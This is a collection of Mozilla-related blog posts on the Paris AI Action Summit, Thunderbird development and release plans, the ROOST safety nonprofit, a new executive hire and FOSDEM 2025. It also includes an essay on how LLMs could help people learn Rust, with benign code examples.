The Mozilla Blog: Paris AI Action Summit: A milestone for open and Public AI

As we close out the Paris AI Action Summit, one thing is clear: the conversation around open and Public AI is evolving—and gaining real momentum. Just over a year ago at Bletchley Park, open source AI was framed as a risk. In Paris, we saw a major shift. There is now a growing recognition that openness isn’t just compatible with AI safety and advancing public interest AI—it’s essential to both.

We have been vocal supporters of an ecosystem grounded in open competition and trustworthy AI—one where innovation isn’t walled off by dominant players or concentrated in a single geography. Mozilla, therefore, came to this Summit with a clear and urgent message: AI must be open, human-centered, and built for the public good. And across discussions, that message resonated.

Open source AI is entering the conversation in a big way

Two particularly notable moments stood out:

  • European Commission President Ursula von der Leyen spoke about Europe’s “distinctive approach to AI,” emphasizing collaborative, open-source solutions as a path forward.
  • India’s Prime Minister Narendra Modi reinforced this vision, calling for open source AI systems to enhance trust and transparency, reduce bias, and democratize technology.

These aren’t just words. The investments and initiatives announced at this Summit mark a real turning point. From the launch of Current AI, an initial $400M public interest AI partnership supporting open source development, to ROOST, a new nonprofit making AI safety tools open and accessible, to the €109 billion investment in AI computing infrastructure announced by President Macron, the momentum is clear. Add to that strong signals from the EU and India, and this Summit stands out as one of the most positive and proactive international gatherings on AI so far.

At the heart of this is Public AI—the idea that we need infrastructure beyond private, purely profit-driven AI. That means building AI that serves society and promotes true innovation even when it doesn’t fit neatly into short-term business incentives. The conversations in Paris show that we’re making progress, but there’s more work to do.

Looking ahead to the next AI summit

Momentum is building, and we must forge onward. The next AI Summit in India will be a critical moment to review the progress on these announcements and ensure organizations like Mozilla—those fighting for open and Public AI infrastructure—have a seat at the table.

Mozilla is committed to turning this vision into reality—no longer a distant, abstract idea, but a movement already in motion.

A huge thanks to the organizers, partners, and global leaders driving this conversation forward. Let’s keep pushing for AI that serves humanity—not the other way around.

––Mitchell Baker
Chairwoman, Mozilla
Paris AI Action Summit Steering Committee Member

The post Paris AI Action Summit: A milestone for open and Public AI appeared first on The Mozilla Blog.

Mozilla Thunderbird: Thunderbird Monthly Development Digest – January 2025

Hello again Thunderbird Community! As January drew to a close, the team was closing in on the completion of some important milestones. Additionally, we had scoped work for our main Q1 priorities. Those efforts are now underway and it feels great to cross things off the list and start tackling new challenges.

As always, you can catch up on all of our previous digests and updates.

FOSDEM – Inspiration, collaboration and education

A modest contingent from the Thunderbird team joined our Mozilla counterparts for an educational and inspiring weekend at FOSDEM recently. We talked about standards, problems, solutions and everything in between. The most satisfying part of the weekend, however, was standing at the Thunderbird booth and hearing the gratitude, suggestions and support from so many users.

With such important discussions among leading voices, we’re keen to help find or implement solutions to some of the meatier topics, such as:

  • OAuth 2.0 Dynamic Client Registration Protocol
  • Support for Unicode email addresses
  • Support for OpenPGP certification authorities and trust delegation

Exchange Web Services support in Rust

Despite a reduction in team capacity for part of January, the team completed work on the following tasks, which form some of the final stages of our 0.2 release:

  • Folder compaction
  • Saving attachments to disk
  • Downloading EWS messages in an nsIChannel

Keep track of feature delivery here.

Account Hub

We completed the second and final milestone in the First Time User Experience for email configuration via the enhanced Account Hub over the course of January. Tasks included density and font awareness, refactoring of state management, OAuth prompts, enhanced error handling and more, all of which can be followed via the meta bug & progress tracking. Watch out for this feature being unveiled in Daily and Beta in the coming weeks!

Global Message Database

With a significant number of the research and prototyping tasks now behind us, the project has taken shape over the course of January with milestones and tasks mapped out. Recent progress has been related to live view, sorting and support for Unicode server and folder names. 

Next up is to finally crack the problem of “non-unique unique IDs” mentioned previously, which is important preparatory groundwork required for a clean database migration. 

In-App Notifications

Phase 2 is now complete, and almost ready for uplift to ESR, pending underlying Firefox dependencies scheduled in early March. Features and user stories in the latest milestone include a cache-control mechanism, a thorough accessibility review, schema changes and the addition of guard rails to limit notification frequency. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

To see things as they land, and help squash early bugs, you can check the pushlog and try running daily. This would be immensely helpful for catching things early.

Toby Pilling
Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – January 2025 appeared first on The Thunderbird Blog.

Niko Matsakis: How I learned to stop worrying and love the LLM

I believe that AI-powered development tools can be a game changer for Rust—and vice versa. At its core, my argument is simple: AI’s ability to explain and diagnose problems with rich context can help people get over the initial bump of learning Rust in a way that canned diagnostics never could, no matter how hard we try. At the same time, rich type systems like Rust’s give AIs a lot to work with, which could be used to help them avoid hallucinations and validate their output. This post elaborates on this premise and sketches out some of the places where I think AI could be a powerful boost.

Perceived learning curve is challenge #1 for Rust

Is Rust good for every project? No, of course not. But it’s absolutely great for some things—specifically, building reliable, robust software that performs well at scale. This is no accident. Rust’s design is intended to surface important design questions (often in the form of type errors) and to give users the control to fix them in whatever way is best.

But this same strength is also Rust’s biggest challenge. Talking to people within Amazon about adopting Rust, I find that perceived complexity and fear of its learning curve are the biggest hurdles. Most people will say, “Rust seems interesting, but I don’t need it for this problem”. And you know, they’re right! They don’t need it. But that doesn’t mean they wouldn’t benefit from it.

One of Rust’s big surprises is that, once you get used to it, it’s “surprisingly decent” at a very large number of things beyond what it was designed for. Simple business logic and scripts can be very pleasant in Rust. But the phrase “once you get used to it” in that sentence is key, since most people’s initial experience with Rust is confusion and frustration.

Rust likes to tell you no (but it’s for your own good)

Some languages are geared to say yes—that is, given any program, they aim to run it and do something. JavaScript is of course the most extreme example (no semicolons? no problem!) but every language does this to some degree. It’s often quite elegant. Consider how, in Python, you write vec[-1] to get the last element in the list: super handy!

Rust is not (usually) like this. Rust is geared to say no. The compiler is just itching for a reason to reject your program. It’s not that Rust is mean: Rust just wants your program to be as good as it can be. So we try to make sure that your program will do what you want (and not just what you asked for). This is why vec[-1], in Rust, will panic: sure, giving you the last element might be convenient, but how do we know you didn’t have an off-by-one bug that resulted in that negative index?1
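To make this concrete, here is a minimal sketch (not from the original post): with a literal index, Rust rejects vec[-1] at compile time, since indices are usize, and a computed out-of-range index panics at runtime rather than silently handing back an element.

fn main() {
    let v = vec![1, 2, 3];

    // Rust indexes with `usize`, so a literal `v[-1]` does not even compile.
    // The explicit way to ask for the last element returns an Option:
    assert_eq!(v.last(), Some(&3));

    // An out-of-range index, say from an off-by-one bug, panics instead of
    // quietly returning the last element:
    // let oops = v[v.len()]; // panics: index out of bounds
}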

But that tendency to say no means that early learning can be pretty frustrating. For most people, the reward from programming comes from seeing their program run—and with Rust, there are a lot of niggling details to get right before your program will run. What’s worse, while those details are often motivated by deep properties of your program (like data races), the way they are presented is as the violation of obscure rules, and the solution (“add a *”) can feel random.

Once you get the hang of it, Rust feels great, but getting there can be a pain. I heard a great phrase from someone at Amazon to describe this: “Rust: the language where you get the hangover first”.3

AI today helps soften the learning curve

My favorite thing about working at Amazon is getting the chance to talk to developers early in their Rust journey. Lately I’ve noticed an increasing trend—most are using Q Developer. Over the last year, Amazon has been doing a lot of internal promotion of Q Developer, so that in and of itself is no surprise, but what did surprise me a bit is hearing from developers the way that they use it.

For most of them, the most valuable part of Q Dev is not authoring code but rather explaining it. They ask it questions like “why does this function take an &T and not an Arc<T>?” or “what happens when I move a value from one place to another?”. Effectively, the LLM becomes an ever-present, ever-patient teacher.4

Scaling up the Rust expert

Some time back I sat down with an engineer learning Rust at Amazon. They asked me about an error they were getting that they didn’t understand. “The compiler is telling me something about ‘static, what does that mean?” Their code looked something like this:

async fn log_request_in_background(message: &str) {
    tokio::spawn(async move {
        log_request(message);
    });
}

And the compiler was telling them:

error[E0521]: borrowed data escapes outside of function
 --> src/lib.rs:2:5
  |
1 |   async fn log_request_in_background(message: &str) {
  |                                      -------  - let's call the lifetime of this reference `'1`
  |                                      |
  |                                      `message` is a reference that is only valid in the function body
2 | /     tokio::spawn(async move {
3 | |         log_request(message);
4 | |     });
  | |      ^
  | |      |
  | |______`message` escapes the function body here
  |        argument requires that `'1` must outlive `'static`

This is a pretty good error message! And yet it requires significant context to understand it (not to mention scrolling horizontally, sheesh). For example, what is “borrowed data”? What does it mean for said data to “escape”? What is a “lifetime” and what does it mean that “'1 must outlive 'static”? Even assuming you get the basic point of the message, what should you do about it?

The fix is easy… if you know what to do

Ultimately, the answer to the engineer’s problem was just to insert a call to clone5. But deciding on that fix requires a surprisingly large amount of context. In order to figure out the right next step, I first explained to the engineer that this confusing error is, in fact, what it feels like when Rust saves your bacon, and talked them through how the ownership model works and what it means to free memory. We then discussed why they were spawning a task in the first place (the answer: to avoid the latency of logging)—after all, the right fix might be to just not spawn at all, or to use something like rayon to block the function until the work is done.

Once we established that the task needed to run asynchronously from its parent, and hence had to own the data, we looked into changing the log_request_in_background function to take an Arc<String> so that it could avoid a deep clone. This would be more efficient, but only if the caller themselves could cache the Arc<String> somewhere. It turned out that the origin of this string was in another team’s code and that this code only returned an &str. Refactoring that code would probably be the best long term fix, but given that the strings were expected to be quite short, we opted to just clone the string.
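For reference, here is a minimal sketch of where we ended up, mirroring the earlier snippet (log_request is the same hypothetical logging function):

async fn log_request_in_background(message: &str) {
    // Clone *before* spawning so the task owns its data. This is a deep
    // clone, but fine for the short strings involved here.
    let message = message.to_owned();
    tokio::spawn(async move {
        log_request(&message);
    });
}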

You can learn a lot from a Rust error

An error message is often your first and best chance to teach somebody something.—Esteban Küber (paraphrased)

Working through this error was valuable. It gave me a chance to teach this engineer a number of concepts. I think it demonstrates a bit of Rust’s promise—the idea that learning Rust will make you a better programmer overall, regardless of whether you are using Rust or not.

Despite all the work we have put into our compiler error messages, this kind of detailed discussion is clearly something that we could never achieve. It’s not because we don’t want to! The original concept for --explain, for example, was to present a customized explanation of each error, tailored to the user’s code. But we could never figure out how to implement that.

And yet tailored, in-depth explanation is absolutely something an LLM could do. In fact, it’s something they already do, at least some of the time—though in my experience the existing code assistants don’t do nearly as good a job with Rust as they could.

What makes a good AI opportunity?

Emery Berger is a professor at UMass Amherst who has been exploring how LLMs can improve the software development experience. Emery emphasizes how AI can help close the gap from “tool to goal”. In short, today’s tools (error messages, debuggers, profilers) tell us things about our program, but they stop there. Except in simple cases, they can’t help us figure out what to do about it—and this is where AI comes in.

When I say AI, I am not talking (just) about chatbots. I am talking about programs that weave LLMs into the process, using them to make heuristic choices or proffer explanations and guidance to the user. Modern LLMs can also do more than just rely on their training and the prompt: they can be given access to APIs that let them query and get up-to-date data.

I think AI will be most useful in cases where solving the problem requires external context not available within the program itself. Think back to my explanation of the 'static error, where knowing the right answer depended on how easy/hard it would be to change other APIs.

Where I think Rust should leverage AI

I’ve thought about a lot of places I think AI could help make working in Rust more pleasant. Here is a selection.

Deciding whether to change the function body or its signature

Consider this code:

fn get_first_name(&self, alias: &str) -> &str {
    alias
}

This function will give a type error, because the signature (thanks to lifetime elision) promises to return a string borrowed from self but actually returns a string borrowed from alias. Now…what is the right fix? It’s very hard to tell in isolation! It may be that in fact the code was meant to be &self.name (in which case the current signature is correct). Or perhaps it was meant to be something that sometimes returns &self.name and sometimes returns alias, in which case the signature of the function was wrong. Today, we take our best guess. But AI could help us offer more nuanced guidance.
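For concreteness, here is a sketch of the two candidate fixes, using a hypothetical type with a name field:

struct Person { name: String }

impl Person {
    // Fix (a): the signature was right and the body was wrong.
    fn get_first_name(&self, _alias: &str) -> &str {
        &self.name
    }

    // Fix (b): the body was right, so the signature must tie the returned
    // borrow to `alias` rather than to `self`.
    fn get_first_name_from_alias<'a>(&self, alias: &'a str) -> &'a str {
        alias
    }
}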

Translating idioms from one language to another

People often ask me questions like “how do I make a visitor in Rust?” The answer, of course, is “it depends on what you are trying to do”. Much of the time, a Java visitor is better implemented as a Rust enum and match statements, but there is a time and a place for something more like a visitor. Guiding folks through the decision tree for how to do non-trivial mappings is a great place for LLMs.
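As a sketch of what that mapping often looks like: what would be a Visitor interface with visitCircle/visitRect methods in Java frequently collapses into an enum and a match in Rust (hypothetical Shape example):

enum Shape {
    Circle { radius: f64 },
    Rect { width: f64, height: f64 },
}

// Each `visit*` method becomes one match arm; exhaustiveness checking
// replaces the "did I override every method?" question.
fn area(shape: &Shape) -> f64 {
    match shape {
        Shape::Circle { radius } => std::f64::consts::PI * radius * radius,
        Shape::Rect { width, height } => width * height,
    }
}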

Figuring out the right type structure

When I start writing a Rust program, I start by authoring type declarations. As I do this, I tend to think ahead to how I expect the data to be accessed. Am I going to need to iterate over one data structure while writing to another? Will I want to move this data to another thread? The setup of my structures will depend on the answer to these questions.

I think a lot of the frustration beginners feel comes from not having a “feel” yet for the right way to structure their programs. The structure they would use in Java or some other language often won’t work in Rust.

I think an LLM-based assistant could help here by asking them some questions about the kinds of data they need and how it will be accessed. Based on this it could generate type definitions, or alter the definitions that exist.
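To make that concrete, here is a sketch of how the answers to those questions might change the declarations (all names hypothetical):

use std::collections::HashMap;
use std::sync::{Arc, Mutex};

// "Single thread, read documents while updating counts": plain owned types.
struct SingleThreadedIndex {
    documents: Vec<String>,
    word_counts: HashMap<String, usize>,
}

// "Shared across threads, counts mutated concurrently": wrap the shared
// state so the types are Send + Sync.
struct SharedIndex {
    documents: Arc<Vec<String>>,                     // shared, read-only
    word_counts: Arc<Mutex<HashMap<String, usize>>>, // shared, mutated under a lock
}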

Complex refactorings like splitting structs

A follow-on to the previous point is that, in Rust, when your data access patterns change as a result of refactorings, it often means you need to do more wholesale updates to your code.6 A common example for me is that I want to split out some of the fields of a struct into a substruct, so that they can be borrowed separately.7 This can be quite non-local and sometimes involves some heuristic choices, like “should I move this method to be defined on the new substruct or keep it where it is?”.
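A minimal sketch of the kind of split in question (hypothetical editor types):

// Before the split, borrowing the view fields mutably locked out `text`.
// Splitting them into a substruct keeps the borrows disjoint.
struct Editor {
    text: String,
    view: ViewState,
}

struct ViewState {
    scroll: usize,
    selection: (usize, usize),
}

// Moving this function to a method on ViewState (or keeping it elsewhere)
// is exactly the kind of heuristic choice mentioned above.
fn redraw(view: &mut ViewState, text: &str) {
    let _ = (view.scroll, view.selection, text.len()); // placeholder body
}

fn update(editor: &mut Editor) {
    // Field-level borrows through the substruct stay disjoint:
    redraw(&mut editor.view, &editor.text);
}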

Migrating consumers over a breaking change

When you run the cargo fix command today it will automatically apply various code suggestions to clean up your code. With the upcoming Rust 2024 edition, cargo fix --edition will do the same but for edition-related changes. All of the logic for these changes is hardcoded in the compiler, and it can get a bit tricky.

For editions, we intentionally limit ourselves to local changes, so the coding for these migrations is usually not too bad, but there are some edge cases where it’d be really useful to have heuristics. For example, one of the changes we are making in Rust 2024 affects “temporary lifetimes”. It can affect when destructors run. This almost never matters (your vector will get freed a bit earlier or whatever) but it can matter quite a bit if the destructor happens to be a lock guard or something else with side effects. In practice, when I as a human work with changes like this, I can usually tell at a glance whether something is likely to be a problem—but the heuristics I use to make that judgment are a combination of knowing the names of the types involved, knowing something about the way the program works, and perhaps skimming the destructor code itself. We could hand-code these heuristics, but an LLM could do it better, and it could ask questions if it was feeling unsure.

Now imagine you are releasing the 2.x version of your library. Maybe your API has changed in significant ways. Maybe one API call has been broken into two, and the right one to use depends a bit on what you are trying to do. Well, an LLM can help here, just like it can help in translating idioms from Java to Rust.

I imagine the idea of having an LLM help you migrate makes some folks uncomfortable. I get that. There’s no reason it has to be mandatory—I expect we could always have a more limited, precise migration available.8

Optimize your Rust code to eliminate hot spots

Premature optimization is the root of all evil, or so Donald Knuth is said to have said. I’m not sure about all evil, but I have definitely seen people rathole on microoptimizing a piece of code before they know if it’s even expensive (or, for that matter, correct). This is doubly true in Rust, where cloning a small data structure (or reference counting it) can often make your life a lot simpler. Llogiq’s great talks on Easy Mode Rust make exactly this point. But here’s a question: suppose you’ve been taking this advice to heart, inserting clones and the like, and you find that your program is running kind of slow. How do you make it faster? Or, even worse, suppose that you are trying to tune your network service. You are looking at the blizzard of available metrics and trying to figure out what changes to make. What do you do? To get some idea of what is possible, check out Scalene, a Python profiler that is also able to offer suggestions (from Emery Berger’s group at UMass, the professor I talked about earlier).
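As a tiny illustration of that “easy mode” style (a sketch, not taken from the talks themselves):

use std::rc::Rc;

fn main() {
    // Deep clone: copies the entire allocation.
    let owned = vec![0u8; 1_000_000];
    let _deep = owned.clone();

    // Reference counting: `clone` just bumps a counter, no copy.
    let shared = Rc::new(vec![0u8; 1_000_000]);
    let _cheap = Rc::clone(&shared);
}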

Diagnose and explain miri and sanitizer errors

Let’s look a bit to the future. I want us to get to a place where the “minimum bar” for writing unsafe code is that you test that unsafe code with some kind of sanitizer that checks for both C and Rust UB—something like miri today, except one that works “at scale” for code that invokes FFI or does other arbitrary things. I expect a smaller set of people will go further, leveraging automated reasoning tools like Kani or Verus to prove statically that their unsafe code is correct9.

From my experience using miri today, I can tell you two things. (1) Every bit of unsafe code I write has some trivial bug or other. (2) If you enjoy puzzling out the occasionally inscrutable error messages you get from Rust, you’re gonna love miri! To be fair, miri has a much harder job—the (still experimental) rules that govern Rust aliasing are intended to be flexible enough to allow all the things people want to do that the borrow checker doesn’t permit. This means they are much more complex. It also means that explaining why you violated them (or may violate them) is that much more complicated.
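To ground point (1), here is about the smallest such bug, a sketch that compiles cleanly but that miri flags immediately:

fn main() {
    let p: *const i32;
    {
        let x = 42;
        p = &x; // the raw pointer now outlives `x`
    }
    // Compiles, but this is a use-after-free; miri reports that the
    // pointer's allocation has been freed.
    let v = unsafe { *p };
    println!("{v}");
}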

Just as an AI can help novices understand the borrow checker, it can help advanced Rustaceans understand tree borrows (or whatever aliasing model we wind up adopting). And just as it can make smarter suggestions for whether to modify the function body or its signature, it can likely help you puzzle out a good fix.

Rust’s emphasis on “reliability” makes it a great target for AI

Anyone who has used an LLM-based tool has encountered hallucinations, where the AI just makes up APIs that “seem like they ought to exist”.10 And yet anyone who has used Rust knows that “if it compiles, it works” is true way more often than it has a right to be.11 This suggests to me that any attempt to use the Rust compiler to validate AI-generated code or solutions is going to also help ensure that the code is correct.

AI-based code assistants right now don’t really have this property. I’ve noticed that I kind of have to pick between “shallow but correct” or “deep but hallucinating”. A good example is match statements. I can use rust-analyzer to fill in the match arms and it will do a perfect job, but the body of each arm is todo!. Or I can let the LLM fill them in and it tends to cover most-but-not-all of the arms but it generates bodies. I would love to see us doing deeper integration, so that the tool is talking to the compiler to get perfect answers to questions like “what variants does this enum have” while leveraging the LLM for open-ended questions like “what is the body of this arm”.12
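Concretely, reusing the hypothetical Shape enum from the earlier sketch, the “shallow but correct” half of that trade looks like this:

// rust-analyzer expands every arm exhaustively, but each body is a stub
// for the human (or the LLM) to fill in.
fn describe(shape: &Shape) -> String {
    match shape {
        Shape::Circle { radius } => todo!(),
        Shape::Rect { width, height } => todo!(),
    }
}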

Conclusion

Overall AI reminds me a lot of the web around the year 2000. It’s clearly overhyped. It’s clearly being used for all kinds of things where it is not needed. And it’s clearly going to change everything.

If you want to see examples of what is possible, take a look at the ChatDBG videos published by Emery Berger’s group. You can see how the AI sends commands to the debugger to explore the program state before explaining the root cause. I love the video debugging bootstrap.py, as it shows the AI applying domain knowledge about statistics to debug and explain the problem.

My expectation is that compilers of the future will not contain nearly so much code geared around authoring diagnostics. They’ll present the basic error, sure, but for more detailed explanations they’ll turn to AI. It won’t be just a plain old foundation model, they’ll use RAG techniques and APIs to let the AI query the compiler state, digest what it finds, and explain it to users. Like a good human tutor, the AI will tailor its explanations to the user, leveraging the user’s past experience and intuitions (oh, and in the user’s chosen language).

I am aware that AI has some serious downsides. The most serious to me is its prodigious energy use, but there are also good questions to be asked about the way that training works and the possibility of not respecting licenses. The issues are real but avoiding AI is not the way to solve them. Just in the course of writing this post, DeepSeek was announced, demonstrating that there is a lot of potential to lower the costs of training. As far as the ethics and legality, that is a very complex space. Agents are already doing a lot to get better there, but note also that most of the applications I am excited about do not involve writing code so much as helping people understand and alter the code they’ve written.


  1. We don’t always get this right. For example, I find the zip combinator of iterators annoying because it takes the shortest of the two iterators, which is occasionally nice but far more often hides bugs. ↩︎

  2. The irony, of course, is that AI can help you to improve your woeful lack of tests by auto-generating them based on code coverage and current behavior. ↩︎

  3. I think they told me they heard it somewhere on the internet? Not sure the original source. ↩︎

  4. Personally, the thing I find most annoying about LLMs is the way they are trained to respond like groveling servants. “Oh, that’s a good idea! Let me help you with that” or “I’m sorry, you’re right I did make a mistake, here is a version that is better”. Come on, I don’t need flattery. The idea is fine but I’m aware it’s not earth-shattering. Just help me already. ↩︎

  5. Inserting a call to clone is actually a bit more subtle than you might think, given the interaction of the async future here. ↩︎

  6. Garbage Collection allows you to make all kinds of refactorings in ownership structure without changing your interface at all. This is convenient, but—as we discussed early on—it can hide bugs. Overall I prefer having that information be explicit in the interface, but that comes with the downside that changes have to be refactored. ↩︎

  7. I also think we should add a feature like View Types to make this less necessary. In this case instead of refactoring the type structure, AI could help by generating the correct type annotations, which might be non-obvious. ↩︎

  8. My hot take here is that if the idea of an LLM doing migrations in your code makes you uncomfortable, you are likely (a) overestimating the quality of your code and (b) underinvesting in tests and QA infrastructure2. I tend to view an LLM like an “inconsistently talented contributor”, and I am perfectly happy having contributors hack away on projects I own. ↩︎

  9. The student asks, “When unsafe code is proven free of UB, does that make it safe?” The master says, “Yes.” The student asks, “And is it then still unsafe?” The master says, “Yes.” Then, a minute later, “Well, sort of.” (We may need new vocabulary.) ↩︎

  10. My personal favorite story of this is when I asked ChatGPT to generate me a list of “real words and their true definition along with 2 or 3 humorous fake definitions” for use in a birthday party game. I told it that “I know you like to hallucinate so please include links where I can verify the real definition”. It generated a great list of words along with plausible looking URLs for merriamwebster.com and so forth—but when I clicked the URLs, they turned out to all be 404s (the words, it turned out, were real—just not the URLs). ↩︎

  11. This is not a unique property of Rust, it is shared by other languages with rich type systems, like Haskell or ML. Rust happens to be the most widespread such language. ↩︎

  12. I’d also like it if the LLM could be a bit less interrupt-y sometimes. Especially when I’m writing type-system code or similar things, it can be distracting when it keeps trying to author stuff it clearly doesn’t understand. I expect this too will improve over time—and I’ve noticed that while, in the beginning, it tends to guess very wrong, over time it tends to guess better. I’m not sure what inputs and context are being fed to the LLM in the background but it’s evident that it can come to see patterns even for relatively subtle things. ↩︎

The Mozilla Blog: ROOST: Open source AI safety for everyone

Today we want to point to one of the most exciting announcements at the Paris AI summit: the launch of ROOST, a new nonprofit to build AI safety tools for everyone. 

ROOST stands for Robust Open Online Safety Tools, and it’s solving a clear and important problem: many startups, nonprofits, and governments are trying to use AI responsibly every day, but they lack access to even the most basic safety tools and resources that are available to large tech companies. This not only puts users at risk but slows down innovation. ROOST has backing from top tech companies and philanthropies alike, ensuring that a broad set of stakeholders has a vested interest in its success. This is critical to building the accessible, scalable and resilient safety infrastructure all of us need for the AI era.

What does this mean practically? ROOST is building, open sourcing and maintaining modular building blocks for AI safety, and offering hands-on support from technical experts to enable organizations of all sizes to build and use AI responsibly. With that, organizations can tackle some of the biggest safety challenges, such as eliminating child sexual abuse material (CSAM) from AI datasets and models.

At Mozilla, we’re proud to have helped kickstart this work, providing a small seed grant for the research at Columbia University that eventually turned into ROOST. Why did we invest early? Because we believe the world needs nonprofit public AI organizations that at once complement and serve as a counterpoint to what’s being built inside the big commercial AI labs. ROOST is exactly this kind of organization, with the potential to create the kind of public technology infrastructure the Mozilla, Linux, and Apache foundations developed in the previous era of the internet.

Our support of ROOST is part of a bigger investment in open source AI and safety. 

In October 2023, before the AI Safety Summit in Bletchley Park, Mozilla worked with Professor Camille Francois and Columbia University to publish an open letter that stated “when it comes to AI Safety and Security, openness is an antidote not a poison.”

Over 1,800 leading experts and community members signed our letter, which compelled us to start the Columbia Convening series to advance the conversation around AI, openness, and safety. The second Columbia Convening (an official event on the road to the French AI Action Summit happening this week) brought together over 45 experts and builders in AI to advance practical approaches to AI safety. This work helped shape some of the priorities of ROOST and create a community ready to engage with it going forward. We are thrilled to see ROOST emerge from the 100+ leading AI open source organizations we’ve been bringing together over the past year. It exemplifies the principles of openness, pluralism, and practicality that unite this growing community.

Much has changed in the last year. At the Bletchley Park summit, a number of governments and large AI labs had focused the debate on the so-called existential risks of AI — and were proposing limits on open source AI. Just 15 months later, the tide has shifted. With the world gathering at the AI Action Summit in France, countries are embracing openness as a key component of making AI safe in practical development and deployment contexts. This is an important turning point. 

ROOST launches at exactly the right time and in the right place, using this global AI summit to gather a community that will create the practical building blocks we need to enable a safer AI ecosystem. This is the type of work that makes AI safety a field that everyone can shape and improve.

The post ROOST: Open source AI safety for everyone appeared first on The Mozilla Blog.

Mozilla Thunderbird: Thunderbird Desktop Release Channel Will Become Default in March 2025

We have an exciting announcement! Starting with the 136.0 release in March 2025, the Thunderbird Desktop Release channel will be the default download.

If you’re not already familiar with the Release channel, it will be a supported alternative to the ESR channel, providing monthly major releases instead of annual ones. This offers several benefits to our users:

  • Frequent Feature Updates: New features will potentially be available each month, versus the annual Extended Support Release (ESR).
  • Smoother Transitions: Moving from one monthly release to the next will be less disruptive than updating between ESR versions.
  • Consistent Bug Fixes: Users will receive all available bug fixes, rather than relying on patch uplifts, as is the case with ESR.

We’ve been publishing monthly releases since 124.0. We added the Thunderbird Desktop Release Channel to the download page on Oct 1st, 2024.

The next step is to make the release channel an officially supported channel and the default download. We don’t expect this step alone to increase the population significantly. We’re exploring additional methods to encourage adoption in the future, such as in-app notifications to invite ESR users to switch.

One of our goals for 2025 is to increase active installations on the release channel to at least 20% of the total installations. At last check, we had 29,543 active installations on the release channel, compared to 20,918 on beta, and 5,941 on daily. The release channel installations currently account for 0.27% of the 10,784,551 total active installations tracked on stats.thunderbird.net.

To support this transition and ensure stability for monthly releases, we’re implementing several process improvements, including:

  • Pre-merge freezes: A 4-day soft code freeze of comm-central before merging into comm-beta. We continue to bake the week-long post-merge freeze of the release channel into the schedule.
  • Pre-merge reviews: We evaluate changes prior to both merges (central to beta and beta to release) where risky changes can be reverted.
  • New uplift template: A new and more thorough uplift template.

For more details on the release process, please see the Release section of the developer docs.

For more details on scheduling, please see the Thunderbird Releases & Events calendar.

Thank you for your support with this exciting step for Thunderbird. Let’s work together to make the Release channel a success in 2025!

Regards,
Corey

Corey Bryant
Manager, Release Operations | Mozilla Thunderbird

Note: This blog post was taken from Corey’s original announcement on our Thunderbird Planning mailing list.

The post Thunderbird Desktop Release Channel Will Become Default in March 2025 appeared first on The Thunderbird Blog.

The Mozilla Blog: Welcoming Peter Rojas as Mozilla’s SVP of New Products

Headshot of Peter Rojas, Senior Vice President of New Products at Mozilla, wearing a gray sweater and smiling against a white background.

We’re thrilled to share that Peter Rojas has joined Mozilla Corporation as our new Senior Vice President of New Products. In this role, Peter will lead Mozilla’s endeavors to explore, build and scale new products that align with Mozilla’s greater mission and values. He will report to me and join Mozilla’s steering committee. 

At Mozilla, we are continuing to explore and scale new products that diversify revenue, address evolving consumer needs, and positively impact this new era of the internet. Peter brings a deep well of experience at the intersection of technology, entrepreneurship and product innovation, expertise that will help Mozilla monetize and expand beyond our flagship browser. His leadership will be instrumental in bringing exciting new products to consumers who value privacy, choice and an open web.

Early in Peter’s career, he co-founded several influential startups, including the consumer technology news and review organization Engadget and the blogging network Weblogs Inc. He was also a founding partner at Betaworks Ventures, where he invested in groundbreaking companies like Rec Room, Hugging Face, Facemoji, and 8th Wall, among others. Several of these companies were later acquired by Niantic, Twitter and Google.

Most recently, Peter led incubations and early-stage explorations as head of product for Meta’s New Product Experimentation (NPE) group. He was also a senior product director for Messenger and Instagram Direct, where he helped tackle some of Meta’s biggest product challenges, including the monetization of Messenger. Peter also served as VP of strategy at AOL, overseeing strategy for AOL’s brand group, and was later promoted to co-director of AOL Alpha, the company’s experimental new product group.

In the past few months, Mozilla has brought on some strong, innovative product leadership, welcoming talent such as Anthony Enzor-DeMeo, Firefox SVP, and Ajit Varma, VP of Firefox Product. I look forward to working closely with Peter and our other new product leaders as Mozilla continues to evolve, offering a range of new products and services that advance our mission.

The post Welcoming Peter Rojas as Mozilla’s SVP of New Products appeared first on The Mozilla Blog.

About:Community: FOSDEM 2025: A Celebration of Open Source Innovation

Amazing weather at FOSDEM 2025

Brussels came alive this weekend as Mozilla joined FOSDEM 2025, Europe’s premier open-source conference. FOSDEM isn’t just another tech gathering; it is a vibrant community, open source innovation, and the spirit of collaboration in action. And we’re proud to have been part of this amazing event since its inception.

This year, FOSDEM celebrated its 25th anniversary. And unlike previous years’ gloomy weather, we were blessed with surprising sunshine, almost as if the universe was applauding a quarter-century of open-source achievements.

As for Mozilla, our presence this year was extra special as we introduced our new brand. Over the weekend, we ran a bingo challenge at the Mozilla and Thunderbird stands, where participants could play to win exclusive Mozilla t-shirts and other special swag. It was a really fun way to introduce the many projects from across Mozilla.

We also showcased a sneak peek of Firefox Nightly’s new tab group feature in the Mozilla booth and gave away 2300 free cookies to participants on Saturday.

Here are some more highlights from our presence this year:

Highlights from Saturday

  • Mozilla engineering manager Marco Casteluccio presented a talk in the main track about using LLMs to support Firefox developers with code review.
  • Firefox engineer Valentin Gosu also presented a talk in the DNS track about his journey using the getaddrinfo API in Firefox.
  • Nazim Can Altinova, another Firefox engineer working on the Firefox Profiler, also presented a talk in the Web Performance track. It’s also worth mentioning that the Web Performance devroom was co-run by some Mozillians.
  • Danny Colin, one of Mozilla’s active contributors, hosted a WebExtension BoF session featuring representatives from Mozilla Firefox (Rob Wu & Simeon Vincent) and Google Chrome’s extensions team (Oliver Dunk). This was the first time the team ran a Birds Of a Feather session, and it’s very likely that we’re going to do the same next year.
  • Danny Colin also hosted the Community Gathering, where old and new contributors got together to discuss the future of Mozilla’s community. It was really nice to have an interactive session where all of us could share our perspectives, so thank you to everyone who attended!

Highlights from Sunday

Mitchell Baker is presenting at FOSDEM 2025

  • Mitchell Baker kicked off Sunday with a keynote session that offered a thought-provoking exploration of Free/Libre Open Source Software (FLOSS) in the age of artificial intelligence and demonstrated how Mozilla plays a role in defining a principled approach to AI that prioritizes transparency, ethics, and community-driven innovation. It was a perfect opening for the talks that we presented at the Mozilla devroom later that day.
  • Around the same time as Mitchell’s session, Mozilla engineer Max Inden also delivered a presentation in the Network devroom, showcasing various techniques the Firefox team uses to enhance Firefox performance.
